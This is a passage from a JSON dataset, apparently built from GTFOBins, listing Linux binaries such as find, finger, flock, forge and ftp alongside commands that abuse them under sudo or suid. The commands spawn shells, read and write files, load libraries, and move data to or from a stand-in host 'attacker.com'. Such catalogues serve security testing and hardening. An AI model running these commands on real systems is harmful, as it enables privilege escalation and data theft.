/path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ffmpeg:library-load:0:sudo","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ffmpeg:library-load:0:suid","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ffmpeg:library-load:0:unprivileged","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fgrep:file-read:0:sudo","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fgrep:file-read:0:suid","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fgrep:file-read:0:unprivileged","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:0:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:0:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:0:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:1:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:1:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:1:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-read:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-read:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-read:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-write:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-write:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-write:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:shell:0:sudo","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:shell:0:suid","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh -p \\; -quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:shell:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:download:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:download:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:download:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:upload:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:upload:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:upload:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:firejail:shell:0:sudo","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/firejail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:firejail:shell:0:unprivileged","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/firejail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fish:shell:0:sudo","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fish:shell:0:suid","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fish:shell:0:unprivileged","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:flock:shell:0:sudo","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/flock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:flock:shell:0:suid","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/flock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:flock:shell:0:unprivileged","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/flock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:0:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:0:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:0:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:1:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:1:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:1:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fold:file-read:0:sudo","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fold/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fold:file-read:0:suid","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fold/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fold:file-read:0:unprivileged","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fold/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:forge:shell:0:sudo","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/forge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:forge:shell:0:suid","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/forge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:forge:shell:0:unprivileged","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/forge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fping:file-read:0:sudo","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fping/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fping:file-read:0:suid","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fping/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fping:file-read:0:unprivileged","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fping/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:download:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:download:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:download:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of 